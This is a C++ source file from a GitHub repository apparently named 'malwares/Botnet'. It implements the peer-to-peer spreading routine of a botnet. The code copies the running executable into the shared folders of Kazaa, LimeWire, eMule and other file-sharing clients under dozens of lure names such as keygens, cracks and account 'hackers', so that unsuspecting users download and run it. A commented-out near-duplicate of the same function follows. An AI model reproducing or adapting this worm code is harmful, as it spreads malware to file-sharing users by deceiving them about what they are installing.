forked from malwares/Botnet
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpeer2peer.cpp
172 lines (156 loc) · 4.79 KB
/
peer2peer.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
#include "../h/includes.h"
char *szProgFilePath[] =
{
"kazaa\\my shared folder\\",
"kazaa lite\\my shared folder\\",
"kazaa lite k++\\my shared folder\\",
"icq\\shared folder\\",
"grokster\\my grokster\\",
"bearshare\\shared\\",
"edonkey2000\\incoming\\",
"emule\\incoming\\",
"morpheus\\my shared folder\\",
"limewire\\shared\\",
"tesla\\files\\",
"winmx\\shared\\",
};
char *szFiles[] =
{
"Windows 2008 Server KeyGen.exe",
"DeadSpace KeyGen.exe",
"Half-Life 2 WORKS-ON-STEAM.exe",
"Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe",
"Password Cracker.exe",
"FTP Cracker.exe",
"Hotmail Hacker.exe",
"Hotmail Cracker.exe",
"Norton Anti-Virus 2008 Enterprise Crack.exe",
"Kaspersky 2009 Full Suite Crack.exe",
"Microsoft Visual C++ 6 KeyGen.exe",
"Microsoft Visual Basic 6 KeyGen.exe",
"Microsoft Visual Studio 6 KeyGen.exe",
"Microsoft Visual Studio 2008 KeyGen.exe",
"Microsoft Visual Basic 2008 KeyGen.exe",
"Microsoft Visual C++ 2008 KeyGen.exe",
"MSN Live Password Cracker.exe",
"AOL Instant Messenger (AIM) Cracker.exe",
"AOL Triton Cracker.exe",
"ICQ Account Cracker.exe",
"AOL Password Cracker.exe",
"Counter-Strike KeyGen.exe",
"Counter-Strike Source KeyGen.exe",
"DivX Pro KeyGen.exe",
"RuneScape Cracker.exe",
"RuneScape Gold Exploit.exe",
"Windows XP Keygen",
"Windows XP Crack.exe",
"Windows Vista Keygen",
"Widnows Vista Crack.exe",
"Kaspersky Crck.exe",
"Kaspersky Keygen.exe",
"WOW Account Cracker.exe",
"Project 7 Private 4.8.exe",
"Virus Generator.exe",
"Virus Maker.exe",
"Nod32 Crack.exe",
"Nod32 Keygen.exe",
"Steam Account Stealer.exe",
"Myspace Cracker.exe",
"Myspace Bruteforce.exe",
"Myspace Attack.exe",
"Limewire Pro Downloader.exe",
"Limewire Speed Patch",
"Tcpip Patch.exe",
"MSN Hacker 2008.exe",
"MSN Hacker 2009.exe",
"AOL Hacker 2008.exe",
"AOL Hacker 2009.exe",
"YIM HAcker 2008.exe",
"YIM HAcker 2009.exe",
"PhotoShop Keygen.exe",
"Adobe Photoshop Keygen.exe",
"Adobe Photoshop Crack.exe",
"Photoshop Crack.exe",
"Adobe Keygen.exe",
"Adobe Photoshop CS3 Keygen.exe",
"Adobe Photoshop CS4 KeyGen.exe",
"RuneScape 2008 - Newest Exploits.exe"
};
bool InfectP2P_ProgramFiles()
{
Peer2PeerInfo_s *pPeer2PeerInfo_s = new Peer2PeerInfo_s;
if (pPeer2PeerInfo_s)
ZeroMemory(pPeer2PeerInfo_s, sizeof(Peer2PeerInfo_s));
else
ExitThread(0);
//Find ProgramfilesDir//
PUCHAR strresult = new UCHAR[26];
PUCHAR progdir = new UCHAR[200];
HKEY key = NULL;
DWORD datasize = 200;
DWORD dwRet = 0;
ZeroMemory((PVOID)strresult,26);
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",0,KEY_READ,&key);
dwRet = RegQueryValueEx(key,"ProgramFilesDir",NULL,NULL,(LPBYTE)progdir,&datasize);
RegCloseKey(key);
////////////////////
GetModuleFileName(GetModuleHandle(NULL), pPeer2PeerInfo_s->szDirectory, sizeof(pPeer2PeerInfo_s->szDirectory));
for (int i = 0; i < (sizeof(szProgFilePath) / sizeof(LPTSTR)); i++)
{
for (int j = 0; j < (sizeof(szFiles) / sizeof(LPTSTR)); j++)
{
char p2pfolder[1024];
sprintf( p2pfolder, "%s\\%s",
progdir,
szProgFilePath[i]);
strcpy(pPeer2PeerInfo_s->szProgFilePath, p2pfolder);
strcat(pPeer2PeerInfo_s->szProgFilePath, szFiles[j]);
if (CopyFile(pPeer2PeerInfo_s->szDirectory, pPeer2PeerInfo_s->szProgFilePath, false) != 0)
{
SetFileAttributes(pPeer2PeerInfo_s->szProgFilePath, FILE_ATTRIBUTE_NORMAL);
}
}
}
delete pPeer2PeerInfo_s;
return true;
}
/*
bool InfectP2P_ProgramFiles()
{
Peer2PeerInfo_s *pPeer2PeerInfo_s = new Peer2PeerInfo_s;
if (pPeer2PeerInfo_s)
ZeroMemory(pPeer2PeerInfo_s, sizeof(Peer2PeerInfo_s));
else
ExitThread(0);
//Find ProgramfilesDir//
PUCHAR strresult = new UCHAR[26];
PUCHAR progdir = new UCHAR[200];
HKEY key = NULL;
DWORD datasize = 200;
DWORD dwRet = 0;
ZeroMemory((PVOID)strresult,26);
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",0,KEY_READ,&key);
dwRet = RegQueryValueEx(key,"ProgramFilesDir",NULL,NULL,(LPBYTE)progdir,&datasize);
RegCloseKey(key);
////////////////////
GetModuleFileName(GetModuleHandle(NULL), pPeer2PeerInfo_s->szDirectory, sizeof(pPeer2PeerInfo_s->szDirectory));
for (int i = 0; i < (sizeof(szPath) / sizeof(LPTSTR)); i++)
{
for (int j = 0; j < (sizeof(szFiles) / sizeof(LPTSTR)); j++)
{
char p2pfolder[1024];
sprintf( p2pfolder, "%s\\%s",
progdir,
szPath[i]);
strcpy(pPeer2PeerInfo_s->szFilePath, p2pfolder);
strcat(pPeer2PeerInfo_s->szFilePath, szFiles[j]);
if (CopyFile(pPeer2PeerInfo_s->szDirectory, pPeer2PeerInfo_s->szFilePath, false) != 0)
{
SetFileAttributes(pPeer2PeerInfo_s->szFilePath, FILE_ATTRIBUTE_NORMAL);
}
}
}
delete pPeer2PeerInfo_s;
return true;
}
*/